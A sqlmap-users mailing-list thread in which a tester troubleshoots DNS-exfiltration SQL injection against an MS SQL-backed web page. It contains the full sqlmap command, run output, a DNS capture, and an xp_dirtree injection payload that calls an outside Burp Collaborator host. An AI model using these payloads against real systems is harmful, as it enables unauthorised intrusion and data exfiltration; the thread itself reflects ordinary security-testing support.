Thanks, that's good advice. And I probably should post a little more detail on
what I'm running here so others can see it as well.
Here's the command executing:
root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory
--force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com
--force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
___
__H__
___ ___[.]_____ ___ ___ {1.0.12#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 16:56:14
[16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
[16:56:14] [INFO] setting up DNS server instance
custom injection marking character ('*') found in option
'--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q]
n
[16:56:16] [INFO] testing connection to the target URL
[16:56:18] [INFO] testing if the target URL is stable
[16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
comparison on a sequence matcher. If no dynamic nor injectable parameters are
detected, or in case of junk results, refer to user's manual paragraph 'Page
comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
'ProductCategory' might not be injectable
[16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
[16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE
or HAVING clause (IN)'
[16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
(comment)'
[16:56:39] [WARNING] time-based comparison requires larger statistical model,
please wait......... (done)
[16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
injectable
[16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Also, you can try to
rerun by providing either a valid value for option '--string' (or '--regexp').
If you suspect that there is some kind of protection mechanism involved (e.g.
WAF) maybe you could retry with an option '--tamper' (e.g.
'--tamper=space2comment')
[16:58:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times
[*] shutting down at 16:58:03
And then, my capture results for DNS traffic:
root@bass:~# tcpdump -n -i eth0 udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org.
(30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
www.testsite.org. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
173.213.231.200 (46)
16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org.
(30)
16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
www.testsite.org. (30)
16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
173.213.231.200 (46)
16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org.
(30)
16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
www.testsite.org. (30)
16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
173.213.231.200 (46)
16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org.
(30)
16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
www.testsite.org. (30)
16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200
(46)
16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org.
(30)
16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
www.testsite.org. (30)
16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
It doesn't seem like an injection pattern is being tried that is getting the
DNS exfiltration to occur... or else I'm doing something else wrong.
Thanks,
V
________________________________
From: Miroslav Stampar <miroslav.stam...@gmail.com>
Sent: Monday, December 19, 2016 4:10 PM
To: Mark M.
Cc: sqlmap-users@lists.sourceforge.net
Subject: Re: [sqlmap-users] Sqlmap/DNS exfil
I would suggest you to run the wireshark or similar when running the
--dns-domain to properly debug what is going on. There could be really lots of
problems before you fine tune it (e.g. other service running on :53).
About the "forcing" sqlmap for using dns-exfil. It will always at least try to
test it at the start of a run (if other injection technique available). Also,
it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil.
However, there is a hidden switch "--force-dns" which will force the usage of
dns-exfil even if ERROR/UNION are available.
As said, the best advice I can give to you is to run the wireshark during the
run and really see what is going on.
Bye
On Mon, Dec 19, 2016 at 11:03 PM, Mark M.
<vv...@hotmail.com<mailto:vv...@hotmail.com>> wrote:
I have a situation where Burp has detected the following DNS exfiltration
injection for a query parameter in a web app:
GET
/XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net<http://orator.net>\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20
HTTP/1.1
To make that a little easier to read, the injected value is:
';declare @q varchar(99);set
@q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net<http://orator.net>\rtf';
exec master.dbo.xp_dirtree @q;--
I've modified the domain and verified that I receive the DNS requests on my
local DNS server (the domain which I provide to sqlmap using the
--dns-domain=xxx option) when the injection is manually sent to the page. The
problem is, when I pass the request to sqlmap it's not detecting that there's
an injection at all. I've provided the OS/DBMS and --level 5, but still no
dice. I'm using sqlmap v1.0.12#stable.
Since I've gotten many other injections to work in the past, I believe that I'm
using sqlmap properly (formatting my request in a file appropriately,
specifying the correct parameter to test, etc.) However, it surprised me that
what appeared to be a fairly straight-forward stacked SQL injection would slip
by all of sqlmap's tests. Is there a way to force sqlmap to try DNS
exfiltration injections despite no other injection technique succeeding?
Thanks
V
------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net<mailto:sqlmap-users@lists.sourceforge.net>
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
